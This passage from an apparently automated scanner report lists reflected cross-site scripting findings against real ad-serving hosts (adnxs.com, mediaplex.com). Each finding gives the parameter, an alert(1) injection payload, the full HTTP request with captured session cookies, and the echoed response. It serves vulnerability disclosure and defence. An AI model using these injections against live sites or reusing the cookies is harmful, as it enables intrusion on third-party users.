Set-Cookie: anj=Kfw)lByDua)J710aOM'D:VY6`(M#*5)x6%ZQle>qFJiV6:R[2UGvCZ++S2so2Ybq/r#3*cS>U8.'z.vXElwJqGM/5x@vLa9ueV)^H4r+JJ+C-ddQ1qZJ:/XjJ9<6aOD_MrCwv(mBCYmDcE-Tl4:9_[c8?@EeMaqJ.yN5<5mLj8`N!dT%i@0bw2Xe'dokyGXFtG>M/IRYEJsibu?SI3qQw[*)*mmhp)(ehTN+Ta5>FlCtd<bAL?`VmUm8o'X(413o9%p^3L?zzm2PW[a+JoYlT7X)X#*QzKFJcDDdNjc``>G='qa(fwb5u@qODYk?^i8cs8w3/rwP9O7X_@z[7:)^2>Jc/X+t7`g+bNMx*5c=Z4N3PMa#ceDw'Bp'!RZ8Ml-O.LnL5*##@)'ncuWZ@Sszt^hd.*k0aD]U_E7H^fpK*S6'>9[%%Lj%m@EbOXI$:-MX9tf-6ZRx0F_Kl_AxolJbEQBAY'dApM0[ei_E7J9!sp=@a6p7`540U5e`cMY:JT9`Nf[3S_=5u`G]7cL7ghMH=)URttH+^+kj8^=)8D9D?/Ld+GOW0>rLLnzr'@02'AO3HBBH*6D5.*fhD/4jT=N?zO:KfewE3^7(STvmGX`L.o@R^NP$Zk`_Wyh!LYNEY$YoK[>v6CK:+IIitV3wj2xxk_.xwBDU>^uPl@vU@EGIpFz>?bZk(%k%IZbU@kUbBRUeN2E1RRt=Msqw[i4x*jA[/; path=/; expires=Mon, 26-Sep-2011 01:24:50 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 28 Jun 2011 01:24:50 GMT
Content-Length: 2482

function writeJS(doc){
var str='';
str += '<iframe src="http:\/\/view.atdmt.com\/COM\/iview\/328578506\/direct;wi.300;hi.250\/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Cl
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=2.487059&creativeID=122560&message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-&managed=falsea6759';alert(1)//7760d9fdbab" width="1" height="1"/>
...[SNIP]...

1.299. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d7f5'-alert(1)-'169b70f7cb8 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=VVbT9UQX_T_7ovPQLbr4PwAAAKCZmfk_-6Lz0C26-D9UVtP1RBf9P2tHbO389Xkl_ayDGovBdy-nLglOAAAAAKNLAABlAQAAPwMAACwAAACCrgIAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCgBEBAgUCAQQAAAAASyiRugAAAAA.&tt_code=vert-4&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m&referrer=http://www.marketbuy54.com9d7f5'-alert(1)-'169b70f7cb8&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E31650&pp=AAABMNPeP6SqDSLySbsQOgIueNa0gWLQ3uB5fg&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(LySbQMwS2^iaSt_p$[-:TBnE@aC<#9*.nltI)XNNPwVx(%HnEP=5=>4*(jD:87VAtIqF29$`Km9D9>ZK)?2c%msp>pQGV5t>0g8sUVPSNJ34Q]czDMKoqe:4:5U4Ch9%kLuQluXvy%O+fUo8B)mrl#xz/YMev85nA8Mv)Ob/>XH*2FVGu'oM9S^1l)@Uf#Tro_v0H%q^t_6=+]4rtLD5+G3ieo(?lT[Wh^wVHs`!yw+'MW!G/ka7gEgz$=zLI2Zd:9#C0wwzC+0an6QT0to+x'=8Mma8u%vvE[ZiIoKZ4VbvQe[t'OmH#1TB%2%Y9(p0a56.t$%1?cH]wP<VSF^Ce5ElfAC>udbAO(m_6I?^8b#6#RpvlKg#2=?9HBu]AiUU`D]ZEXo9^(2I0Sw9_Xwk2)0XMBjJgfnV>DfPP2-ySke3KcYcEnJzhMLJuVEYkCun1*AoH@`^Q9m-<JCgl<!QWf64vzopnj(X6'_0NAfQ0<9Iry7l:a4mai[CcBGW>PY5#VlMu4iA0(D^.ix'R^?PRUE$2h_5-lr<*!2[0+c?IetVd%>]9PhKSrwP1BlM=+K:COp(zTP2eBeoaX6dGfi--9m+msYLOduGMpQql.4('Jzk<m)S4b+1>>H`/ZbyK@NT!y`Fmh_$QsF_#mBJAVS7rE>(%(BEQ_`32sk0FVJsRwVwKIdAmZ:!t:!db*%(hds6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:31:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:31:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 28 Jun 2011 01:31:02 GMT
Content-Length: 1242

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=NJoAZ80z8j-LbOf7qfHuPwAAAKCZmfk_-6Lz0C2
...[SNIP]...
KEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m&referrer=http://www.marketbuy54.com9d7f5'-alert(1)-'169b70f7cb8&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7
...[SNIP]...

1.300. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9531a'-alert(1)-'de38887df16 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=VVbT9UQX_T_7ovPQLbr4PwAAAKCZmfk_-6Lz0C26-D9UVtP1RBf9P2tHbO389Xkl_ayDGovBdy-nLglOAAAAAKNLAABlAQAAPwMAACwAAACCrgIAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCgBEBAgUCAQQAAAAASyiRugAAAAA.&tt_code=vert-49531a'-alert(1)-'de38887df16&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m&referrer=http://www.marketbuy54.com&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E31650&pp=AAABMNPeP6SqDSLySbsQOgIueNa0gWLQ3uB5fg&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(LySbQMwS2^iaSt_p$[-:TBnE@aC<#9*.nltI)XNNPwVx(%HnEP=5=>4*(jD:87VAtIqF29$`Km9D9>ZK)?2c%msp>pQGV5t>0g8sUVPSNJ34Q]czDMKoqe:4:5U4Ch9%kLuQluXvy%O+fUo8B)mrl#xz/YMev85nA8Mv)Ob/>XH*2FVGu'oM9S^1l)@Uf#Tro_v0H%q^t_6=+]4rtLD5+G3ieo(?lT[Wh^wVHs`!yw+'MW!G/ka7gEgz$=zLI2Zd:9#C0wwzC+0an6QT0to+x'=8Mma8u%vvE[ZiIoKZ4VbvQe[t'OmH#1TB%2%Y9(p0a56.t$%1?cH]wP<VSF^Ce5ElfAC>udbAO(m_6I?^8b#6#RpvlKg#2=?9HBu]AiUU`D]ZEXo9^(2I0Sw9_Xwk2)0XMBjJgfnV>DfPP2-ySke3KcYcEnJzhMLJuVEYkCun1*AoH@`^Q9m-<JCgl<!QWf64vzopnj(X6'_0NAfQ0<9Iry7l:a4mai[CcBGW>PY5#VlMu4iA0(D^.ix'R^?PRUE$2h_5-lr<*!2[0+c?IetVd%>]9PhKSrwP1BlM=+K:COp(zTP2eBeoaX6dGfi--9m+msYLOduGMpQql.4('Jzk<m)S4b+1>>H`/ZbyK@NT!y`Fmh_$QsF_#mBJAVS7rE>(%(BEQ_`32sk0FVJsRwVwKIdAmZ:!t:!db*%(hds6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:30:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:30:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 28 Jun 2011 01:30:54 GMT
Content-Length: 1242

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=NJoAZ80z8j-LbOf7qfHuPwAAAKCZmfk_-6Lz0C2
...[SNIP]...
click?cd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D&tt_code=vert-49531a'-alert(1)-'de38887df16&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6
...[SNIP]...

1.301. http://ib.adnxs.com/if [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The value of the custom_macro request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d99d"><script>alert(1)</script>70d2897260f was submitted in the custom_macro parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if?enc=NJoAZ80z8j-LbOf7qfHuPwAAAKCZmfk_-6Lz0C26-D9UVtP1RBf9P2tHbO389Xkl_ayDGovBdy-nLglOAAAAAKNLAABlAQAAPwMAACwAAACCrgIAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCgBEBAgUCAQQAAAAAyScldgAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D&tt_code=vert-4&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m&referrer=http://www.marketbuy54.com&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E316501d99d"><script>alert(1)</script>70d2897260f HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(LySbQMwS2^iaSt_p$[-:TBnE@aC<#9*.nltI)XNNPwVx(%HnEP=5=>4*(jD:87VAtIqF29$`Km9D9>ZK)?2c%msp>pQGV5t>0g8sUVPSNJ34Q]czDMKoqe:4:5U4Ch9%kLuQluXvy%O+fUo8B)mrl#xz/YMev85nA8Mv)Ob/>XH*2FVGu'oM9S^1l)@Uf#Tro_v0H%q^t_6=+]4rtLD5+G3ieo(?lT[Wh^wVHs`!yw+'MW!G/ka7gEgz$=zLI2Zd:9#C0wwzC+0an6QT0to+x'=8Mma8u%vvE[ZiIoKZ4VbvQe[t'OmH#1TB%2%Y9(p0a56.t$%1?cH]wP<VSF^Ce5ElfAC>udbAO(m_6I?^8b#6#RpvlKg#2=?9HBu]AiUU`D]ZEXo9^(2I0Sw9_Xwk2)0XMBjJgfnV>DfPP2-ySke3KcYcEnJzhMLJuVEYkCun1*AoH@`^Q9m-<JCgl<!QWf64vzopnj(X6'_0NAfQ0<9Iry7l:a4mai[CcBGW>PY5#VlMu4iA0(D^.ix'R^?PRUE$2h_5-lr<*!2[0+c?IetVd%>]9PhKSrwP1BlM=+K:COp(zTP2eBeoaX6dGfi--9m+msYLOduGMpQql.4('Jzk<m)S4b+1>>H`/ZbyK@NT!y`Fmh_$QsF_#mBJAVS7rE>(%(BEQ_`32sk0FVJsRwVwKIdAmZ:!t:!db*%(hds6; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:30:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:30:54 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(0^JaQMwS2AI!-e6!ce^YV+O42!m4#X_lJsL6%AfcdViN$CXG`dv)fm4*(jDOj[D*tIqF29$`L69=J#IrK+frBj'UC7WV[TX).x/=D62F!TCQ2AyEATt#ojn[1:+-sZi3F``BM_Ba$20t<d6uZXybnav0nsR<R$J[0RKM3`4Yk(cYArNDrLXn7gK@MR(<9i^t8*Qz@!Eco'R0:)8x>:U!FV7_YkicN#Bj>xIsm[uuMh38>z7c:iUfaUf/`t85dt4m]#qvi'^WW91L4^v?o*s)g#^S%C^WGaroUQj+mS0``TjFbhyOhS=tu@EQo.#'yoRk?J4RZ#IbWl>t^r)/g60jzx0XCyCFbbF3YNhP9>4MidgZMk^lbE6E!%G9B^R0-2Zcwp72rm)%*e/0=dhQfyc5C[R?:wj8YK@q7$YR2pYfse+cT]JK?Rk8w@:u%LEDpT!CK:l>pgrgGX4Mz^OrM0`)emy0KHc`zAYhfZL(6n*u/%pqa6wBxkHm]CHg?ZwWNOZNb-A9PqJ_18Xt9(=1p-Kn0ym_TH/h79%8N(WQT#'2r9X6e/7)T11Y/=lMX(Kx$Av:h#5?<Zw-YPb$QwL!B#4:Kl0LvWS-R'nLPTRneXoXqEv`i[@-nD77p`JPr)uH@:0UGkkggpm81dMcs!_jp>?K8:hk32pX(k:1H:8Rxpiwi'XfEuw_9(QN?J*s9b[3@aA4pw#d*w[Y+8.wcPc; path=/; expires=Mon, 26-Sep-2011 01:30:54 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 28 Jun 2011 01:30:54 GMT
Content-Length: 1978

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4733.Quantcast/B4993641.3;sz=300x250;ord=316501d99d"><script>alert(1)</script>70d2897260f;click=http://exch.quantserve.com/r?a=p-800TOflix8dOQ&labels=_qc.clk,_click.adserver.rtb&rtbip=63.251.90.151&rtbdata2=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPc
...[SNIP]...

1.302. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2f65"%3balert(1)//16af6c3a47b was submitted in the imp_rvr_id parameter. This input was echoed as b2f65";alert(1)//16af6c3a47b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-17177-2%2F4%3Fmpt%3D2386637677267723220%26siteid%3D0%26adid%3D327952%26imp_id%3D2386637677267723220%26fcid%3D327942%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fe0a304%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D244212456737%26imp_rvr_id%3D244212456737&mpt=2386637677267723220&siteid=0&adid=327952&imp_id=2386637677267723220&fcid=327942&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fe0a304&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=244212456737&imp_rvr_id=244212456737b2f65"%3balert(1)//16af6c3a47b&mpvc=http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2F1CMbkVIKHyEurgkAaAABAA%2Furl%2F HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:33:29 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 20:12:54 GMT
ETag: "78880e-a5c-4a67ad3a6fd80"
Accept-Ranges: bytes
Content-Length: 3578
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck244212456737b2f65";alert(1)//16af6c3a47b\">" );
var rvr_id=244212456737b2f65";alert(1)//16af6c3a47b;
var mpserv;

...[SNIP]...

1.303. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da817"%3balert(1)//8907316c81d was submitted in the mpck parameter. This input was echoed as da817";alert(1)//8907316c81d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-17177-2%2F4%3Fmpt%3D2386637677267723220%26siteid%3D0%26adid%3D327952%26imp_id%3D2386637677267723220%26fcid%3D327942%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fe0a304%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D244212456737%26imp_rvr_id%3D244212456737da817"%3balert(1)//8907316c81d&mpt=2386637677267723220&siteid=0&adid=327952&imp_id=2386637677267723220&fcid=327942&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fe0a304&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=244212456737&imp_rvr_id=244212456737&mpvc=http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2F1CMbkVIKHyEurgkAaAABAA%2Furl%2F HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:33:27 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 20:12:54 GMT
ETag: "78880e-a5c-4a67ad3a6fd80"
Accept-Ranges: bytes
Content-Length: 3580
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck244212456737\">" );
var rvr_id=244212456737;
var mpserv;
var mpi="<mpi/>";
var mpcrgif="htt
